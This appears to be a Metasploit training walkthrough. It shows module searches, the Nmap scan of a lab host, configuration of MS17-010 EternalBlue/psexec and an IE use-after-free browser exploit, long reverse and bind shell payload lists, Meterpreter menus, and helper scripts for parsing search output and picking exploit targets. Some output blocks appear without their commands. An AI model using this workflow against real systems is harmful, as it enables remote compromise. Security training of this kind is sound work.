Prepending a value with '-' will exclude any matching results. If no options or keywords are provided, cached results are displayed.
OPTIONS:
  -h                  Show this help information
  -o <file>           Send output to a file in csv format
  -S <string>         Regex pattern used to filter search results
  -u                  Use module if there is one result
  -s <search_column>  Sort the search results based on <search_column> in ascending order
  -r                  Reverse the search results order to descending order

Keywords:
  aka         : Modules with a matching AKA (also-known-as) name
  author      : Modules written by this author
  arch        : Modules affecting this architecture
  bid         : Modules with a matching Bugtraq ID
  cve         : Modules with a matching CVE ID
  edb         : Modules with a matching Exploit-DB ID
  check       : Modules that support the 'check' method
  date        : Modules with a matching disclosure date
  description : Modules with a matching description
  fullname    : Modules with a matching full name
  mod_time    : Modules with a matching modification date
  name        : Modules with a matching descriptive name
  path        : Modules with a matching path
  platform    : Modules affecting this platform
  port        : Modules with a matching port
  rank        : Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref         : Modules with a matching ref
  reference   : Modules with a matching reference
  target      : Modules affecting this target
  type        : Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

Supported search columns:
  rank            : Sort modules by their exploitability rank
  date            : Sort modules by their disclosure date. Alias for disclosure_date
  disclosure_date : Sort modules by their disclosure date
  name            : Sort modules by their name
  type            : Sort modules by their type
  check           : Sort modules by whether or not they have a check method

Examples:
  search cve:2009 type:exploit
  search cve:2009 type:exploit platform:-linux
  search cve:2009 -s name
  search type:exploit -s type -r
For example, we can try to find the EternalRomance exploit for older Windows operating systems. The Nmap scan of the target that points us there might look like this:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:38 UTC
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.87 seconds
We launch msfconsole and search for the Microsoft bulletin ID that covers this vulnerability, MS17-010:

MSF - Search MS17_010
msf6 > search ms17_010
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
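The keyword, exclusion and sort semantics from the `search` help text, applied to the listing just printed, as an added example that is not part of Metasploit. It parses the module table the way msfconsole prints it (columns separated by two or more spaces, the Disclosure Date column possibly empty) and then reproduces `type:`, `check:`, `rank:` with comparison operators, the `-` prefix for exclusion, and `-s <column> -r` sorting. The sample table is the MS17-010 listing above; the numeric rank scale (manual=0 up to excellent=600) is the one Metasploit assigns to module rankings. The operators accepted here (gt, gte, lt, lte, a bare number or a rank name) are an assumption about the exact set msfconsole supports; check its own parser for the authoritative list.

```python
"""
Parse and filter msfconsole `search` output outside the console.
Added example, not Metasploit code: demonstrates the keyword, exclusion
and sort semantics documented by `search -h` on a constructed table.
"""
import re

# Constructed sample: the `search ms17_010` table shown on this page.
SAMPLE = """\
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
"""

# Metasploit's numeric module ranking scale (used by rank:gte400 etc.).
RANK_VALUE = {"manual": 0, "low": 100, "average": 200, "normal": 300,
              "good": 400, "great": 500, "excellent": 600}


def parse_modules(text):
    """Turn the printed table into dicts. Fields are separated by 2+ spaces;
    the rank word anchors each row because Disclosure Date may be blank."""
    mods = []
    for line in text.splitlines():
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) < 5 or not fields[0].isdigit():
            continue  # title, header, ruler and blank lines
        rank_pos = next((i for i, f in enumerate(fields) if f in RANK_VALUE), None)
        if rank_pos is None:
            continue
        mods.append({
            "index": int(fields[0]),
            "name": fields[1],
            "type": fields[1].split("/", 1)[0],       # exploit, auxiliary, post, ...
            "date": fields[2] if rank_pos == 3 else "",
            "rank": fields[rank_pos],
            "check": fields[rank_pos + 1] == "Yes",   # module implements `check`
            "description": " ".join(fields[rank_pos + 2:]),
        })
    return mods


def rank_matches(rank, expr):
    """rank:<expr>: a rank name, a bare number, or gt/gte/lt/lte<number>."""
    value = RANK_VALUE[rank]
    if expr in RANK_VALUE:
        return rank == expr
    m = re.fullmatch(r"(gte|gt|lte|lt)?(\d+)", expr)
    if not m:
        raise ValueError(f"bad rank expression: {expr}")
    op, n = m.group(1), int(m.group(2))
    return {None: value == n, "gt": value > n, "gte": value >= n,
            "lt": value < n, "lte": value <= n}[op]


def search(mods, *terms, type_=None, check=None, rank=None):
    """Keyword filters plus free-text terms matched against name and
    description; a leading '-' excludes, like platform:-linux in the help."""
    out = []
    for m in mods:
        if type_ is not None and m["type"] != type_:
            continue
        if check is not None and m["check"] != check:
            continue
        if rank is not None and not rank_matches(m["rank"], rank):
            continue
        hay = (m["name"] + " " + m["description"]).lower()
        if all((t.lstrip("-").lower() in hay) != t.startswith("-") for t in terms):
            out.append(m)
    return out


def sort_modules(mods, column, reverse=False):
    """`-s <column>` ascending, `-r` for descending; stable like sorted()."""
    keys = {"rank": lambda m: RANK_VALUE[m["rank"]],
            "date": lambda m: m["date"], "disclosure_date": lambda m: m["date"],
            "name": lambda m: m["name"], "type": lambda m: m["type"],
            "check": lambda m: m["check"]}
    return sorted(mods, key=keys[column], reverse=reverse)


if __name__ == "__main__":
    mods = parse_modules(SAMPLE)
    # Equivalent of: search ms17_010 type:exploit check:true -s rank -r
    for m in sort_modules(search(mods, type_="exploit", check=True), "rank", reverse=True):
        print(m["index"], m["name"], m["rank"], m["date"])
```

The Check column is the one worth filtering on first when a listing is long: a module with `check` support can be run against the host without firing the exploit, which is what we do with the psexec module below.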
Next, we need to select the appropriate module for this scenario. From the Nmap scan we know SMB is exposed and the service banner reads Microsoft Windows 7 - 10. With some additional OS scanning we can narrow this down to a Windows 7 host running a vulnerable SMB instance. We then select the module at index 1 in the search output, exploit/windows/smb/ms17_010_psexec (the EternalRomance/EternalSynergy/EternalChampion chain). Its Check column reads Yes, so we can run `check` to confirm the target is vulnerable before exploiting it. Its options look like this:
Name                  Current Setting                                                 Required  Description
----                  ---------------                                                 --------  -----------
DBGTRACE              false                                                           yes       Show extra debug trace info
LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
RHOSTS                                                                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT                 445                                                             yes       The Target port (TCP)
SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME                                                                  no        The service display name
SERVICE_NAME                                                                          no        The service name
SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain             .                                                               no        The Windows domain to use for authentication
SMBPass                                                                               no        The password for the specified username
SMBUser                                                                               no        The username to authenticate as
       Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
     Module: exploit/windows/smb/ms17_010_psexec
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-14

Provided by:
  sleepya
  zerosum0x0
  Shadow Brokers
  Equation Group

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   PowerShell
  2   Native upload
  3   MOF upload

Check supported:
  Yes

Basic options:
  Name                  Current Setting                                                 Required  Description
  ----                  ---------------                                                 --------  -----------
  DBGTRACE              false                                                           yes       Show extra debug trace info
  LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
  NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
  NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
  RHOSTS                                                                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT                 445                                                             yes       The Target port (TCP)
  SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                                                                  no        The service display name
  SERVICE_NAME                                                                          no        The service name
  SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
  SMBDomain             .                                                               no        The Windows domain to use for authentication
  SMBPass                                                                               no        The password for the specified username
  SMBUser                                                                               no        The username to authenticate as

Payload information:
  Space: 3072

Description:
  This module will exploit SMB with vulnerabilities in MS17-010 to achieve a
  write-what-where primitive. This will then be used to overwrite the
  connection session information as an Administrator session. From there,
  the normal psexec payload code execution is done. Exploits a type confusion
  between Transaction and WriteAndX requests and a race condition in
  Transaction requests, as seen in the EternalRomance, EternalChampion, and
  EternalSynergy exploits. This exploit chain is more reliable than the
  EternalBlue exploit, but requires a named pipe.
Name                  Current Setting                                                 Required  Description
----                  ---------------                                                 --------  -----------
DBGTRACE              false                                                           yes       Show extra debug trace info
LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
RHOSTS                10.10.10.40                                                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT                 445                                                             yes       The Target port (TCP)
SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME                                                                  no        The service display name
SERVICE_NAME                                                                          no        The service name
SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain             .                                                               no        The Windows domain to use for authentication
SMBPass                                                                               no        The password for the specified username
SMBUser                                                                               no        The username to authenticate as
msf6 exploit(windows/browser/ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2012-09-14

Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  OBFUSCATE  false            no        Enable JavaScript obfuscation
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits a vulnerability found in Microsoft Internet Explorer
  (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in
  an unexpected manner, but the same memory is reused again later in the
  CMshtmlEd::Exec() function, leading to a use-after-free condition. Please
  note that this vulnerability has been exploited since Sep 14, 2012. Also,
  note that presently, this module has some target dependencies for the ROP
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present (as it
  is by default). For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or
  below must be installed (which is often the case).
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
OBFUSCATE  false            no        Enable JavaScript obfuscation
SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT    8080             yes       The local port to listen on.
SSL        false            no        Negotiate SSL for incoming connections
SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf6 exploit(windows/browser/ie_execcommand_uaf) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 7 on Windows XP SP3
   2   IE 8 on Windows XP SP3
   3   IE 7 on Windows Vista
   4   IE 8 on Windows Vista
   5   IE 8 on Windows 7
   6   IE 9 on Windows 7
Here we see targets for different Internet Explorer versions on different Windows versions. Leaving the selection on Automatic lets the module choose the target itself. Because this is a client-side (browser) exploit, that choice is made from the browser that connects to the module's listener (its User-Agent and related client-side fingerprinting), not by scanning a remote service; a browser the module has no target for is simply not served the exploit. The description above also lists the ROP-chain dependencies (msvcrt on XP SP3, or JRE 1.6.x or below on Vista and 7) that must hold on the victim for the chosen target to work.
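A model of how the Automatic target is resolved for a browser exploit, as an added example that is not the module's own code: the target list is the one `show targets` printed above, the User-Agent strings are constructed samples, and the assumption that Windows XP is treated as SP3 (the service pack is not present in a User-Agent) is exactly the kind of gap that makes Automatic selection less reliable than setting the target explicitly.

```python
"""
Resolve a browser exploit's "Automatic" target from the victim's request.
Added example, not ie_execcommand_uaf's own code: it models the decision
with a User-Agent parser mapped onto the module's target table.
"""
import re

AUTOMATIC = 0

# Targets exactly as `show targets` lists them for this module.
TARGETS = {
    1: ("IE 7", "Windows XP SP3"),
    2: ("IE 8", "Windows XP SP3"),
    3: ("IE 7", "Windows Vista"),
    4: ("IE 8", "Windows Vista"),
    5: ("IE 8", "Windows 7"),
    6: ("IE 9", "Windows 7"),
}

# NT kernel version string found in the User-Agent -> product name.
NT_VERSIONS = {"5.1": "Windows XP", "6.0": "Windows Vista", "6.1": "Windows 7"}


def fingerprint(user_agent):
    """Return ("IE <major>", "<Windows name>") or None if not a known IE/Windows pair."""
    m = re.search(r"MSIE (\d+)\.\d+;.*?Windows NT (\d\.\d)", user_agent)
    if not m:
        return None
    os_name = NT_VERSIONS.get(m.group(2))
    if os_name is None:
        return None
    return f"IE {m.group(1)}", os_name


def resolve_target(user_agent, configured=AUTOMATIC):
    """Target id for this client, or None when nothing fits.
    A fixed target (`set target 6`) is used as-is; Automatic fingerprints.
    Assumption: the User-Agent carries no service pack, so XP is taken as SP3."""
    if configured != AUTOMATIC:
        return configured
    fp = fingerprint(user_agent)
    if fp is None:
        return None
    ie, os_name = fp
    for tid, (t_ie, t_os) in TARGETS.items():
        if t_ie == ie and t_os.startswith(os_name):
            return tid
    return None


def handle_request(user_agent, configured=AUTOMATIC):
    """What the listener does with a request: serve the exploit page for a
    resolved target, otherwise answer 404 so unsupported clients get nothing."""
    tid = resolve_target(user_agent, configured)
    return ("exploit", tid) if tid is not None else ("404", None)


if __name__ == "__main__":
    # Constructed sample requests from three different clients.
    for ua in ("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
               "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
               "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"):
        print(handle_request(ua), "<-", ua)
```

The IE 10 request above resolves to no target even though the browser is on Windows 7, which is the behaviour to expect from Automatic: it only fires for version pairs the module knows, and an explicit `set target 6` overrides the fingerprint entirely, correct or not.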
msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6
   535  windows/x64/meterpreter/bind_ipv6_tcp       normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   536  windows/x64/meterpreter/bind_ipv6_tcp_uuid  normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   537  windows/x64/meterpreter/bind_named_pipe     normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   538  windows/x64/meterpreter/bind_tcp            normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   539  windows/x64/meterpreter/bind_tcp_rc4        normal  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   540  windows/x64/meterpreter/bind_tcp_uuid       normal  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   541  windows/x64/meterpreter/reverse_http        normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   542  windows/x64/meterpreter/reverse_https       normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   543  windows/x64/meterpreter/reverse_named_pipe  normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   544  windows/x64/meterpreter/reverse_tcp         normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   545  windows/x64/meterpreter/reverse_tcp_rc4     normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   546  windows/x64/meterpreter/reverse_tcp_uuid    normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   547  windows/x64/meterpreter/reverse_winhttp     normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   548  windows/x64/meterpreter/reverse_winhttps    normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
Meterpreter is a specific, multi-faceted payload that uses DLL injection to give a stable connection to the compromised host that is hard to spot with simple checks. It runs entirely in the memory of the remote host and writes nothing to disk, so it leaves little for disk-based forensics to find (memory forensics can still recover it). Because it is memory-resident it also does not survive a reboot on its own; staying on the host across reboots or system changes requires a separate persistence mechanism. Scripts and plugins (extensions) can be loaded and unloaded dynamically as needed.
   #    Name                                         Disclosure Date  Rank    Check  Description
   -    ----                                         ---------------  ----    -----  -----------
   0    aix/ppc/shell_bind_tcp                                        manual  No     AIX Command Shell, Bind TCP Inline
   1    aix/ppc/shell_find_port                                       manual  No     AIX Command Shell, Find Port Inline
   2    aix/ppc/shell_interact                                        manual  No     AIX execve Shell for inetd
   3    aix/ppc/shell_reverse_tcp                                     manual  No     AIX Command Shell, Reverse TCP Inline
   4    android/meterpreter/reverse_http                              manual  No     Android Meterpreter, Android Reverse HTTP Stager
   5    android/meterpreter/reverse_https                             manual  No     Android Meterpreter, Android Reverse HTTPS Stager
   6    android/meterpreter/reverse_tcp                               manual  No     Android Meterpreter, Android Reverse TCP Stager
   7    android/meterpreter_reverse_http                              manual  No     Android Meterpreter Shell, Reverse HTTP Inline
   8    android/meterpreter_reverse_https                             manual  No     Android Meterpreter Shell, Reverse HTTPS Inline
   9    android/meterpreter_reverse_tcp                               manual  No     Android Meterpreter Shell, Reverse TCP Inline
   10   android/shell/reverse_http                                    manual  No     Command Shell, Android Reverse HTTP Stager
   11   android/shell/reverse_https                                   manual  No     Command Shell, Android Reverse HTTPS Stager
   12   android/shell/reverse_tcp                                     manual  No     Command Shell, Android Reverse TCP Stager
   13   apple_ios/aarch64/meterpreter_reverse_http                    manual  No     Apple_iOS Meterpreter, Reverse HTTP Inline
   <SNIP>
   557  windows/x64/vncinject/reverse_tcp                             manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   558  windows/x64/vncinject/reverse_tcp_rc4                         manual  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   559  windows/x64/vncinject/reverse_tcp_uuid                        manual  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   560  windows/x64/vncinject/reverse_winhttp                         manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   561  windows/x64/vncinject/reverse_winhttps                        manual  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
As shown above, there are many payloads to choose from. We can also build our own payloads with msfvenom, which we will get into later. For now we keep the same target as before but, instead of the default payload (a plain reverse_tcp command shell), we use a Meterpreter payload for Windows 7 (x64).

Scrolling the list above, we find the section containing the Meterpreter payloads for Windows (x64).
   515  windows/x64/meterpreter/bind_ipv6_tcp       manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   516  windows/x64/meterpreter/bind_ipv6_tcp_uuid  manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   517  windows/x64/meterpreter/bind_named_pipe     manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   518  windows/x64/meterpreter/bind_tcp            manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   519  windows/x64/meterpreter/bind_tcp_rc4        manual  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   520  windows/x64/meterpreter/bind_tcp_uuid       manual  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   521  windows/x64/meterpreter/reverse_http        manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   522  windows/x64/meterpreter/reverse_https       manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   523  windows/x64/meterpreter/reverse_named_pipe  manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   524  windows/x64/meterpreter/reverse_tcp         manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   525  windows/x64/meterpreter/reverse_tcp_rc4     manual  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   526  windows/x64/meterpreter/reverse_tcp_uuid    manual  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   527  windows/x64/meterpreter/reverse_winhttp     manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   528  windows/x64/meterpreter/reverse_winhttps    manual  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   529  windows/x64/meterpreter_bind_named_pipe     manual  No  Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   530  windows/x64/meterpreter_bind_tcp            manual  No  Windows Meterpreter Shell, Bind TCP Inline (x64)
   531  windows/x64/meterpreter_reverse_http        manual  No  Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   532  windows/x64/meterpreter_reverse_https       manual  No  Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   533  windows/x64/meterpreter_reverse_ipv6_tcp    manual  No  Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   534  windows/x64/meterpreter_reverse_tcp         manual  No  Windows Meterpreter Shell, Reverse TCP Inline x64
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp       normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid  normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe     normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp            normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4        normal  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid       normal  No  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http        normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https       normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe  normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp         normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4     normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid    normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp     normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps    normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
   15  payload/windows/x64/meterpreter/reverse_tcp       normal  No  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4   normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid  normal  No  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)

msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter grep reverse_tcp show payloads
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT          445              yes       The target port (TCP)
SMBDomain      .                no        (Optional) The Windows domain to use for authentication
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of Unicode strings
    enable_unicode_encoding   Enables encoding of Unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel
Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory
Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
